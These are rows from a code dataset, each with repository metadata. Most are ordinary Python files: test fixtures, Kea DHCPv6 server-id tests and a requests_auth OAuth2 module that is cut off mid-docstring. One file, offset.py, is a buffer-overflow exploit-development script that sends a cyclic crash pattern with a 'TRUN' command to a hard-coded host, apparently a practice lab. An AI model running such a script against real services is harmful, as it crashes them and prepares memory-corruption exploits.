| 35.332734 | 143 | 0.65238 | 2,483 | 19,645 | 4.917036 | 0.060411 | 0.085183 | 0.059137 | 0.057007 | 0.869522 | 0.840691 | 0.825457 | 0.789909 | 0.765091 | 0.752641 | 0 | 0.005649 | 0.243013 | 19,645 | 555 | 144 | 35.396396 | 0.815345 | 0.133978 | 0 | 0.734793 | 0 | 0.002433 | 0.200048 | 0.074884 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06326 | false | 0 | 0.007299 | 0 | 0.116788 | 0.104623 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a84d782076ed01480183ca45b180043ec4c81f6c | 206 | py | Python | conftest.py | DocTocToc/silver | f1b4a8871fc4a37c8813d3c010bc70dc59c0a6e5 | [
"Apache-2.0"
] | 222 | 2017-01-15T10:30:57.000Z | 2022-03-08T20:34:46.000Z | conftest.py | DocTocToc/silver | f1b4a8871fc4a37c8813d3c010bc70dc59c0a6e5 | [
"Apache-2.0"
] | 141 | 2017-01-11T10:56:49.000Z | 2021-10-12T11:51:00.000Z | conftest.py | DocTocToc/silver | f1b4a8871fc4a37c8813d3c010bc70dc59c0a6e5 | [
"Apache-2.0"
] | 76 | 2017-01-10T13:50:27.000Z | 2022-03-25T21:37:00.000Z | import pytest
from silver.fixtures.pytest_fixtures import * # NOQA
pytest.register_assert_rewrite('silver.tests.api.specs.document_entry')
pytest.register_assert_rewrite('silver.tests.api.specs.utils')
| 25.75 | 71 | 0.825243 | 28 | 206 | 5.857143 | 0.535714 | 0.170732 | 0.243902 | 0.329268 | 0.560976 | 0.560976 | 0.560976 | 0.560976 | 0 | 0 | 0 | 0 | 0.067961 | 206 | 7 | 72 | 29.428571 | 0.854167 | 0.019417 | 0 | 0 | 0 | 0 | 0.325 | 0.325 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
a86f73899ed329ab06934f220a9efe415efedc31 | 2,748 | py | Python | offset.py | jiro38/Buffer-Overflows | f0186f4361dd9c8a15de7d4bae96ffa854345036 | [
"MIT"
] | 55 | 2020-10-14T13:35:27.000Z | 2022-01-05T14:01:43.000Z | offset.py | jiro38/Buffer-Overflows | f0186f4361dd9c8a15de7d4bae96ffa854345036 | [
"MIT"
] | null | null | null | offset.py | jiro38/Buffer-Overflows | f0186f4361dd9c8a15de7d4bae96ffa854345036 | [
"MIT"
] | 23 | 2020-10-15T19:05:29.000Z | 2022-03-06T19:03:38.000Z | #!/usr/bin/env python3
import socket
#only need socket this time
ip='10.10.83.199'
port=9999
#these should look familiar
# 2300 -
pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy"
#pattern from msf-pattern_create -l 2300
string = "TRUN /.:/ " + pattern
#send it all, should look familiar
try:
with socket.socket() as s:
s.connect((ip,port))
print("sending pattern")
s.send(bytes(string,'latin-1'))
except:
print("failed to connect")
#exception handling like a hacker | 105.692308 | 2,312 | 0.950146 | 70 | 2,748 | 37.285714 | 0.714286 | 0.007663 | 0.013793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.295174 | 0.027293 | 2,748 | 26 | 2,313 | 105.692308 | 0.681257 | 0.067322 | 0 | 0 | 0 | 0 | 0.923739 | 0.899492 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0.166667 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a8a842d23d137c7ae6313f24b7d6c412e5f6c80e | 3,799 | py | Python | tests/dhcpv6/kea_only/test_serverid.py | shawnmullaney/forge | aaaef0a0645f73d24666aab6a400f3604e753aac | [
"0BSD"
] | null | null | null | tests/dhcpv6/kea_only/test_serverid.py | shawnmullaney/forge | aaaef0a0645f73d24666aab6a400f3604e753aac | [
"0BSD"
] | null | null | null | tests/dhcpv6/kea_only/test_serverid.py | shawnmullaney/forge | aaaef0a0645f73d24666aab6a400f3604e753aac | [
"0BSD"
] | null | null | null | """Configure Kea's server-id."""
# pylint: disable=invalid-name,line-too-long
import pytest
import misc
import srv_msg
import srv_control
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.kea_only
@pytest.mark.server_id
def test_v6_server_id_llt():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.config_srv_id('LLT', '00:01:00:02:52:7b:a8:f0:08:00:27:58:f1:e8')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_option_content('Response',
'1',
'NOT ',
'duid',
'00:01:00:01:52:7b:a8:f0:08:00:27:58:f1:e8')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_option_content('Response',
'2',
None,
'duid',
'00:01:00:02:52:7b:a8:f0:08:00:27:58:f1:e8')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.kea_only
@pytest.mark.server_id
def test_v6_server_id_en():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.config_srv_id('EN', '00:02:00:00:09:BF:87:AB:EF:7A:5B:B5:45')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '2')
# Response option 2 MUST contain duid 00:02:00:00:09:BF:87:AB:EF:7A:5B:B5:45.
srv_msg.response_check_include_option('Response', None, '1')
# Response option 1 MUST NOT contain duid 00:02:00:00:09:BF:87:AB:EF:7A:5B:B5:45.
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.kea_only
@pytest.mark.server_id
def test_v6_server_id_ll():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.config_srv_id('LL', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_option_content('Response',
'2',
None,
'duid',
'00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_option_content('Response',
'1',
'NOT ',
'duid',
'00:03:00:01:ff:ff:ff:ff:ff:01')
| 37.613861 | 86 | 0.589629 | 525 | 3,799 | 3.986667 | 0.167619 | 0.065934 | 0.06689 | 0.090779 | 0.92021 | 0.92021 | 0.92021 | 0.92021 | 0.92021 | 0.900143 | 0 | 0.077782 | 0.269018 | 3,799 | 100 | 87 | 37.99 | 0.675909 | 0.059489 | 0 | 0.846154 | 0 | 0.051282 | 0.184292 | 0.069565 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | true | 0.038462 | 0.051282 | 0 | 0.089744 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
766371f92d546ea8669a79512e10418e4257d42a | 262 | py | Python | challanges/queue_with_stacks/conftest.py | Patricia888/data-structures-and-algorithms | 8963acf857b9f7069eeeea2884b41376986c3d7c | [
"MIT"
] | 1 | 2021-01-28T07:32:17.000Z | 2021-01-28T07:32:17.000Z | challanges/queue_with_stacks/conftest.py | Patricia888/data-structures-and-algorithms | 8963acf857b9f7069eeeea2884b41376986c3d7c | [
"MIT"
] | null | null | null | challanges/queue_with_stacks/conftest.py | Patricia888/data-structures-and-algorithms | 8963acf857b9f7069eeeea2884b41376986c3d7c | [
"MIT"
] | 1 | 2020-04-10T08:01:50.000Z | 2020-04-10T08:01:50.000Z | import pytest
from .queue_with_stacks import Queue
@pytest.fixture
def empty_queue():
return Queue()
@pytest.fixture
def short_queue():
return Queue([1, 2, 3, 4])
@pytest.fixture
def long_queue():
return Queue([10, 20, 30, 40, 50, 60, 70, 80])
| 14.555556 | 50 | 0.675573 | 41 | 262 | 4.195122 | 0.585366 | 0.226744 | 0.27907 | 0.244186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093897 | 0.187023 | 262 | 17 | 51 | 15.411765 | 0.713615 | 0 | 0 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | true | 0 | 0.181818 | 0.272727 | 0.727273 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
767cb011b0a17e3f80b2b54e24c79cdeecb48eb8 | 40,681 | py | Python | requests_auth/authentication.py | Simon-Lessage/requests_auth | 159c9825d2167ab40a5bc479bd6e1a12b44e525e | [
"MIT"
] | null | null | null | requests_auth/authentication.py | Simon-Lessage/requests_auth | 159c9825d2167ab40a5bc479bd6e1a12b44e525e | [
"MIT"
] | null | null | null | requests_auth/authentication.py | Simon-Lessage/requests_auth | 159c9825d2167ab40a5bc479bd6e1a12b44e525e | [
"MIT"
] | null | null | null | import sys
from hashlib import sha512
import uuid
import requests
import requests.auth
import warnings
from requests_auth import oauth2_authentication_responses_server, oauth2_tokens
from requests_auth.errors import *
if sys.version_info.major > 2:
# Python 3
from urllib.parse import parse_qs, urlsplit, urlunsplit, urlencode
else:
# Python 2
from urllib import urlencode
from urlparse import parse_qs, urlsplit, urlunsplit
def _add_parameters(initial_url, extra_parameters):
"""
Add parameters to an URL and return the new URL.
:param initial_url:
:param extra_parameters: dictionary of parameters name and value.
:return: the new URL containing parameters.
"""
scheme, netloc, path, query_string, fragment = urlsplit(initial_url)
query_params = parse_qs(query_string)
for parameter_name in extra_parameters.keys():
# TODO Handle parameters with a list as a value and submit PR to requests or Python
query_params[parameter_name] = [extra_parameters[parameter_name]]
new_query_string = urlencode(query_params, doseq=True)
return urlunsplit((scheme, netloc, path, new_query_string, fragment))
def _pop_parameter(url, query_parameter_name):
"""
Remove and return parameter of an URL.
:param url: The URL containing (or not) the parameter.
:param query_parameter_name: The query parameter to pop.
:return: The new URL (without this parameter) and the parameter value (None if not found).
"""
scheme, netloc, path, query_string, fragment = urlsplit(url)
query_params = parse_qs(query_string)
parameter_value = query_params.pop(query_parameter_name, None)
new_query_string = urlencode(query_params, doseq=True)
return urlunsplit((scheme, netloc, path, new_query_string, fragment)), parameter_value
def _get_query_parameter(url, param_name):
scheme, netloc, path, query_string, fragment = urlsplit(url)
query_params = parse_qs(query_string)
all_values = query_params.get(param_name)
return all_values[0] if all_values else None
def request_new_grant_with_post(url, data, grant_name, timeout, auth=None):
response = requests.post(url, data=data, timeout=timeout, auth=auth)
response.raise_for_status()
content = response.json()
token = content.get(grant_name)
if not token:
raise GrantNotProvided(grant_name, content)
return token, content.get('expires_in')
class OAuth2:
token_cache = oauth2_tokens.TokenMemoryCache()
class OAuth2ResourceOwnerPasswordCredentials(requests.auth.AuthBase):
"""
Resource Owner Password Credentials Grant
Describes an OAuth 2 resource owner password credentials (also called password) flow requests authentication.
More details can be found in https://tools.ietf.org/html/rfc6749#section-4.3
"""
def __init__(self, token_url, username, password, **kwargs):
"""
:param token_url: OAuth 2 token URL.
:param username: Resource owner user name.
:param password: Resource owner password.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param scope: Scope parameter sent to token URL as body. Can also be a list of scopes. Not sent by default.
:param token_field_name: Field name containing the token. access_token by default.
:param kwargs: all additional authorization parameters that should be put as body parameters in the token URL.
"""
self.token_url = token_url
if not self.token_url:
raise Exception('Token URL is mandatory.')
self.username = username
if not self.username:
raise Exception('User name is mandatory.')
self.password = password
if not self.password:
raise Exception('Password is mandatory.')
self.kwargs = kwargs
extra_parameters = dict(kwargs)
self.header_name = extra_parameters.pop('header_name', None) or 'Authorization'
self.header_value = extra_parameters.pop('header_value', None) or 'Bearer {token}'
if '{token}' not in self.header_value:
raise Exception('header_value parameter must contains {token}.')
self.token_field_name = extra_parameters.pop('token_field_name', None) or 'access_token'
# Time is expressed in seconds
self.timeout = int(extra_parameters.pop('timeout', None) or 60)
# As described in https://tools.ietf.org/html/rfc6749#section-4.3.2
self.data = {
'grant_type': 'password',
'username': self.username,
'password': self.password,
}
scope = extra_parameters.pop('scope', None)
if scope:
self.data['scope'] = ' '.join(scope) if isinstance(scope, list) else scope
self.data.update(extra_parameters)
all_parameters_in_url = _add_parameters(self.token_url, self.data)
self.state = sha512(all_parameters_in_url.encode('unicode_escape')).hexdigest()
def __call__(self, r):
token = OAuth2.token_cache.get_token(self.state, self.request_new_token)
r.headers[self.header_name] = self.header_value.format(token=token)
return r
def request_new_token(self):
# As described in https://tools.ietf.org/html/rfc6749#section-4.3.3
token, expires_in = request_new_grant_with_post(
self.token_url, self.data, self.token_field_name, self.timeout,
auth=(self.username, self.password)
)
# Handle both Access and Bearer tokens
return (self.state, token, expires_in) if expires_in else (self.state, token)
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
addition_args_str = ', '.join(["{0}='{1}'".format(key, value) for key, value in self.kwargs.items()])
return "OAuth2ResourceOwnerPasswordCredentials('{0}', '{1}', '{2}', {3})".format(
self.token_url, self.username, self.password, addition_args_str
)
class OAuth2ClientCredentials(requests.auth.AuthBase):
"""
Client Credentials Grant
Describes an OAuth 2 client credentials (also called application) flow requests authentication.
More details can be found in https://tools.ietf.org/html/rfc6749#section-4.4
"""
def __init__(self, token_url, username, password, **kwargs):
"""
:param token_url: OAuth 2 token URL.
:param username: Resource owner user name.
:param password: Resource owner password.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param scope: Scope parameter sent to token URL as body. Can also be a list of scopes. Not sent by default.
:param token_field_name: Field name containing the token. access_token by default.
:param kwargs: all additional authorization parameters that should be put as query parameter in the token URL.
"""
self.token_url = token_url
if not self.token_url:
raise Exception('Token URL is mandatory.')
self.username = username
if not self.username:
raise Exception('User name is mandatory.')
self.password = password
if not self.password:
raise Exception('Password is mandatory.')
self.kwargs = kwargs
extra_parameters = dict(kwargs)
self.header_name = extra_parameters.pop('header_name', None) or 'Authorization'
self.header_value = extra_parameters.pop('header_value', None) or 'Bearer {token}'
if '{token}' not in self.header_value:
raise Exception('header_value parameter must contains {token}.')
self.token_field_name = extra_parameters.pop('token_field_name', None) or 'access_token'
# Time is expressed in seconds
self.timeout = int(extra_parameters.pop('timeout', None) or 60)
# As described in https://tools.ietf.org/html/rfc6749#section-4.4.2
self.data = {
'grant_type': 'client_credentials',
}
scope = extra_parameters.pop('scope', None)
if scope:
self.data['scope'] = ' '.join(scope) if isinstance(scope, list) else scope
self.data.update(extra_parameters)
all_parameters_in_url = _add_parameters(self.token_url, self.data)
self.state = sha512(all_parameters_in_url.encode('unicode_escape')).hexdigest()
def __call__(self, r):
token = OAuth2.token_cache.get_token(self.state, self.request_new_token)
r.headers[self.header_name] = self.header_value.format(token=token)
return r
def request_new_token(self):
# As described in https://tools.ietf.org/html/rfc6749#section-4.4.3
token, expires_in = request_new_grant_with_post(
self.token_url, self.data, self.token_field_name, self.timeout,
auth=(self.username, self.password)
)
# Handle both Access and Bearer tokens
return (self.state, token, expires_in) if expires_in else (self.state, token)
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
addition_args_str = ', '.join(["{0}='{1}'".format(key, value) for key, value in self.kwargs.items()])
return "OAuth2ClientCredentials('{0}', '{1}', '{2}', {3})".format(
self.token_url, self.username, self.password, addition_args_str
)
class OAuth2AuthorizationCode(requests.auth.AuthBase):
"""
Authorization Code Grant
Describes an OAuth 2 authorization code (also called access code) flow requests authentication.
Request a code with client browser, then request a token using this code.
Store the token and use it for subsequent valid requests.
More details can be found in https://tools.ietf.org/html/rfc6749#section-4.1
"""
def __init__(self, authorization_url, token_url, **kwargs):
"""
:param authorization_url: OAuth 2 authorization URL.
:param token_url: OAuth 2 token URL.
:param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
:param redirect_uri_port: The port on which the server listening for the OAuth 2 code will be started.
Listen on port 5000 by default.
:param timeout: Maximum amount of seconds to wait for a code or a token to be received once requested.
Wait for 1 minute by default.
:param success_display_time: In case a code is successfully received,
this is the maximum amount of milliseconds the success page will be displayed in your browser.
Display the page for 1 millisecond by default.
:param failure_display_time: In case received code is not valid,
this is the maximum amount of milliseconds the failure page will be displayed in your browser.
Display the page for 5 seconds by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param response_type: Value of the response_type query parameter if not already provided in authorization URL.
code by default.
:param token_field_name: Field name containing the token. access_token by default.
:param code_field_name: Field name containing the code. code by default.
:param username: User name in case basic authentication should be used to retrieve token.
:param password: User password in case basic authentication should be used to retrieve token.
:param kwargs: all additional authorization parameters that should be put as query parameter
in the authorization URL and as body parameters in the token URL.
Usual parameters are:
* client_id: Corresponding to your Application ID (in Microsoft Azure app portal)
* client_secret: If client is not authenticated with the authorization server
* nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
"""
self.authorization_url = authorization_url
if not self.authorization_url:
raise Exception('Authorization URL is mandatory.')
self.token_url = token_url
if not self.token_url:
raise Exception('Token URL is mandatory.')
self.kwargs = kwargs
extra_parameters = dict(kwargs)
self.header_name = extra_parameters.pop('header_name', None) or 'Authorization'
self.header_value = extra_parameters.pop('header_value', None) or 'Bearer {token}'
if '{token}' not in self.header_value:
raise Exception('header_value parameter must contains {token}.')
redirect_uri_endpoint = extra_parameters.pop('redirect_uri_endpoint', None) or ''
redirect_uri_port = int(extra_parameters.pop('redirect_uri_port', None) or 5000)
self.token_field_name = extra_parameters.pop('token_field_name', None) or 'access_token'
# Time is expressed in seconds
self.timeout = int(extra_parameters.pop('timeout', None) or 60)
# Time is expressed in milliseconds
success_display_time = int(extra_parameters.pop('success_display_time', None) or 1)
# Time is expressed in milliseconds
failure_display_time = int(extra_parameters.pop('failure_display_time', None) or 5000)
username = extra_parameters.pop('username', None)
password = extra_parameters.pop('password', None)
self.auth = (username, password) if username and password else None
# As described in https://tools.ietf.org/html/rfc6749#section-4.1.2
code_field_name = extra_parameters.pop('code_field_name', 'code')
if _get_query_parameter(self.authorization_url, 'response_type'):
extra_parameters.pop('response_type', None) # Ensure provided value will not be overridden
else:
# As described in https://tools.ietf.org/html/rfc6749#section-4.1.1
extra_parameters.setdefault('response_type', 'code')
redirect_uri = 'http://localhost:{0}/{1}'.format(redirect_uri_port, redirect_uri_endpoint)
authorization_url_without_nonce = _add_parameters(self.authorization_url, extra_parameters)
authorization_url_without_nonce, nonce = _pop_parameter(authorization_url_without_nonce, 'nonce')
self.state = sha512(authorization_url_without_nonce.encode('unicode_escape')).hexdigest()
custom_code_parameters = {'state': self.state, 'redirect_uri': redirect_uri}
if nonce:
custom_code_parameters['nonce'] = nonce
code_grant_url = _add_parameters(authorization_url_without_nonce, custom_code_parameters)
self.code_grant_details = oauth2_authentication_responses_server.GrantDetails(
code_grant_url,
code_field_name,
self.timeout,
success_display_time,
failure_display_time,
redirect_uri_port
)
# As described in https://tools.ietf.org/html/rfc6749#section-4.1.3
self.token_data = {
'grant_type': 'authorization_code',
'redirect_uri': redirect_uri,
}
self.token_data.update(extra_parameters)
def __call__(self, r):
token = OAuth2.token_cache.get_token(self.state, self.request_new_token)
r.headers[self.header_name] = self.header_value.format(token=token)
return r
def request_new_token(self):
# Request code
state, code = oauth2_authentication_responses_server.request_new_grant(self.code_grant_details)
# As described in https://tools.ietf.org/html/rfc6749#section-4.1.3
self.token_data['code'] = code
# As described in https://tools.ietf.org/html/rfc6749#section-4.1.4
token, expires_in = request_new_grant_with_post(
self.token_url, self.token_data, self.token_field_name, self.timeout, auth=self.auth
)
# Handle both Access and Bearer tokens
return (self.state, token, expires_in) if expires_in else (self.state, token)
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
addition_args_str = ', '.join(["{0}='{1}'".format(key, value) for key, value in self.kwargs.items()])
return "OAuth2AuthorizationCode('{0}', '{1}', {2})".format(
self.authorization_url, self.token_url, addition_args_str
)
class OAuth2Implicit(requests.auth.AuthBase):
"""
Implicit Grant
Describes an OAuth 2 implicit flow requests authentication.
Request a token with client browser.
Store the token and use it for subsequent valid requests.
More details can be found in https://tools.ietf.org/html/rfc6749#section-4.2
"""
def __init__(self, authorization_url, **kwargs):
"""
:param authorization_url: OAuth 2 authorization URL.
:param response_type: Value of the response_type query parameter if not already provided in authorization URL.
token by default.
:param token_field_name: Name of the expected field containing the token.
id_token by default if response_type is id_token, else access_token.
:param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
:param redirect_uri_port: The port on which the server listening for the OAuth 2 token will be started.
Listen on port 5000 by default.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param success_display_time: In case a token is successfully received,
this is the maximum amount of milliseconds the success page will be displayed in your browser.
Display the page for 1 millisecond by default.
:param failure_display_time: In case received token is not valid,
this is the maximum amount of milliseconds the failure page will be displayed in your browser.
Display the page for 5 seconds by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param kwargs: all additional authorization parameters that should be put as query parameter
in the authorization URL.
Usual parameters are:
* client_id: Corresponding to your Application ID (in Microsoft Azure app portal)
